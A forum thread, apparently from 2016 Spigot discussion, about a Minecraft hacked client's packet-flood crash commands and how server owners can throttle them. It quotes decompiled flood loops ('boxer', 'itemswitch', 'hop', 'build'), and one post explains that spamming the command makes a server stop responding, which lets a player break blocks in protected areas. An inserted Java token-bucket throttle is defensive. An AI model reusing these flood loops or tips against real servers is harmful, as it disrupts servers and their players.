'.c boxer' Crash command Conceit Client

Discussion in 'Spigot Discussion' started by YepImRobbie, Jun 30, 2016.

Thread Status:
Not open for further replies.
  1. Is this hack still working? I hope not.

     
  2. Yes, how to patch?
     
  3. Yes, it still works. It is extremely easy to patch, however.
     
  4. Well, technically it's an overload exploit, which causes the server to do a lot of heavy computing, which effectively causes the targeted servers to drop all connections.
     
  5. It is still working, but not on every server.

    That's the module (decompiled with Luyten):

    Code (Text):
                case "boxer": {
                    for (int index = 0; index < 1000000; ++index) {
                        this.minecraft.getNetHandler().addToSendQueue(new C0APacketAnimation());
                    }
                    break;
                }
    To patch it, you only need a plugin which limits the packets.
     
  6. I tried it on some servers and most of them can handle it just fine and don't crash.
     
  7. That depends on the size of the server. Also, you have to do it "right". Just executing it once is mostly useless, but if you spam the command, it often leads to a crash. Remember: you will not get a "crash" message; the server will just not reply to the players (you can remove blocks in protected areas, for example, when the server stops replying to the users).
     
  8. That is a general patch, which can cause issues. A much better alternative would be to patch the actual exploit.
     
  9. No. AAC also uses a packet limiter without any problems. And by the way: 1.9 and 1.10 servers have packet limiters by default, so they should block this automatically.
     
  10. Depending on the buffer it could cause issues if the server has a lag spike.
     
  11. *Small facepalm*

    Look at the code and look at a good buffer, for example from AAC... In the code you can see that it uses "1.000.000" packets, and (with buffer) AAC allows a max. of 50 and most never have problems with AAC.

    So it would be absolutely NO problem to limit it to 100 or 200 packets per second; this would be far away from 1.000.000, so it is blocked very well.
     
  12. So what it sends 1,000,000 packets, when it doesn't even need to send a fraction of those to lag the server. Also, you are missing the whole point of my post. A buffer of 50 packets per second, or even 100 to be generous, would be perfectly fine, unless connection lag spikes occur. But still, limiting packets is a good general idea; however, it doesn't exactly patch this exploit.
     
  13. AAC seems to use a limit of 50 but it works perfectly fine also on lag-spikes. (You could check the TPS etc. with your packet-limiter plugin to make also sure that it detects a lag-spike.)

    That's not true. I tried this also on my own server. You need to spam the ".crash" command and after a few minutes the server stopped. So there are a lot of packets needed.
     
  14. FormallyMyles

    Supporter

    I think NoCheat might have basic protection, I've seen people use ViaVersion in the past just for this purpose because we include a basic one to prevent this kinda stuff.
     
  15. What the hell, I posted this on 30th June and now it gets responses. By the way @Mylescomputer I love you and your plugin, papa bless you.
     
  16. IIRC NoCheatPlus' builds since #1020 offer a packet throttle for pre-1.9 servers. It may need additional configuration.

    https://github.com/NoCheatPlus/NoCheatPlus/commit/fc24fe529c70c449c6b343d3685b72e1cdaf1142

    The "actual" exploit is just a simple overload of system resources. Unfortunately you can't simply patch the fact that computers have finite resources.

    A major benefit of using animation packet here is because the animation packet is rebroadcasted to nearby players (and there's zero validation on the packet's data.) The resulting allocations strain the CPU due to creating pressure in the garbage collector, and what little CPU is left over is used to process the incoming packets in the tick loop; which ends up compounding the issue by rebroadcasting new outgoing packets.

    This is all easily shown if you attach a profiler and observe the "exploit" in action.

    The best and only true way to patch this is a throttle; like restricting incoming packets to 500 per second (you could restrict it way lower than that) or adjusting the max processed packets per player in NetworkManager. Even if someone lags, that still accounts for over 20 seconds of gameplay (20 movement packets per second + buffer zone for actions/attacks/etc) - so it's nearly impossible for that to cause gameplay problems. 500 packets per second can still harm the server, but a general strain can be combatted vs process death.
     
    #17 Cryptkeeper, Aug 1, 2016
    Last edited: Aug 1, 2016
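
The per-connection throttle this thread argues about, as an added example (not code from any poster, AAC, ViaVersion or NoCheatPlus): a token bucket in plain Java, where a sustained rate plus a burst allowance lets a lagging player's queued packets through while a flood is dropped and the connection is closed. The class name `PacketThrottle`, the 100 packets/s rate, the 500-packet burst and the 1000-drop kick threshold are assumptions, and wiring `onPacket` into the server's network pipeline is not shown.

```java
import java.util.HashMap;
import java.util.Map;

/** Per-connection token bucket: a sustained rate plus burst headroom for lag spikes. */
public class PacketThrottle {
    public enum Verdict { ACCEPT, DROP, DISCONNECT }
    private static final class Bucket { double tokens; long lastNanos; long dropped; }

    private final double ratePerSecond;  // sustained packets per second (assumed value below)
    private final double burst;          // packets a client may deliver at once after lagging
    private final long kickAfterDrops;   // dropped packets tolerated before closing the connection
    private final Map<String, Bucket> buckets = new HashMap<>();

    public PacketThrottle(double ratePerSecond, double burst, long kickAfterDrops) {
        this.ratePerSecond = ratePerSecond;
        this.burst = burst;
        this.kickAfterDrops = kickAfterDrops;
    }

    /** Call for every incoming packet before any game logic (ray tracing, rebroadcast) runs. */
    public synchronized Verdict onPacket(String connectionId, long nowNanos) {
        Bucket b = buckets.get(connectionId);
        if (b == null) {
            b = new Bucket();
            b.tokens = burst;            // new connections start with a full bucket
            b.lastNanos = nowNanos;
            buckets.put(connectionId, b);
        }
        double elapsed = Math.max(0, nowNanos - b.lastNanos) / 1e9;
        b.tokens = Math.min(burst, b.tokens + elapsed * ratePerSecond);
        b.lastNanos = nowNanos;
        if (b.tokens >= 1.0) { b.tokens -= 1.0; return Verdict.ACCEPT; }
        return ++b.dropped >= kickAfterDrops ? Verdict.DISCONNECT : Verdict.DROP;
    }

    public synchronized void onDisconnect(String connectionId) { buckets.remove(connectionId); }

    public static void main(String[] args) {
        PacketThrottle throttle = new PacketThrottle(100, 500, 1000);
        // Constructed case 1: a player lagged for 3 s, then 60 queued packets arrive at once.
        int accepted = 0;
        for (int i = 0; i < 60; i++)
            if (throttle.onPacket("lagging-player", 0L) == Verdict.ACCEPT) accepted++;
        System.out.println("lag spike: accepted " + accepted + " of 60");
        // Constructed case 2: packets arriving 1 microsecond apart (1,000,000 per second).
        int sent = 0;
        while (throttle.onPacket("flooder", sent * 1_000L) != Verdict.DISCONNECT) sent++;
        System.out.println("flood: connection closed after " + sent + " packets");
    }
}
```

In production the timestamp would come from `System.nanoTime()` and the check would run on the network thread, so rejected packets never reach the tick loop.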
  17. The overloading is caused by the fact that each time the player swings their arm, the Bukkit implementation does some heavy calculations to perform a ray tracing check. The overload isn't caused by sending swing animations to nearby players, but it certainly helps a little.
     
  18. A packet limiter is better than patching just this one exploit, because there are more crash exploits with many packets:

    Code (Text):
                case "itemswitch": {
                    for (int index = 0; index < 100000; ++index) {
                        this.minecraft.getNetHandler().addToSendQueue(new C09PacketHeldItemChange(2));
                        this.minecraft.getNetHandler().addToSendQueue(new C03PacketPlayer(true));
                        this.minecraft.getNetHandler().addToSendQueue(new C09PacketHeldItemChange(2));
                        this.minecraft.getNetHandler().addToSendQueue(new C03PacketPlayer(true));
                    }
                    break;
                }
    Code (Text):
                case "hop": {
                    for (int index2 = 0; index2 < 1000; ++index2) {
                        this.minecraft.getNetHandler().addToSendQueue(new C03PacketPlayer.C04PacketPlayerPosition(this.minecraft.thePlayer.posX, this.minecraft.thePlayer.posY + 0.1, this.minecraft.thePlayer.posZ, true));
                        this.minecraft.getNetHandler().addToSendQueue(new C03PacketPlayer.C04PacketPlayerPosition(this.minecraft.thePlayer.posX, this.minecraft.thePlayer.posY, this.minecraft.thePlayer.posZ, true));
                    }
                    break;
                }
    Code (Text):
                case "build": {
                    for (int index = 0; index < 10000; ++index) {
                        this.minecraft.getNetHandler().addToSendQueue(new C08PacketPlayerBlockPlacement(new ItemStack(Items.apple)));
                    }
                    break;
                }
    So basically a packet limiter is more effective than just fixing the animation packet exploit, because there are more exploits which all need to spam so many packets.
     
  19. I'm well aware of the exploits. I know the majority of the exploits for the game. I said a packet limiter was a general fix, however it shouldn't be used to fix this particular exploit.
     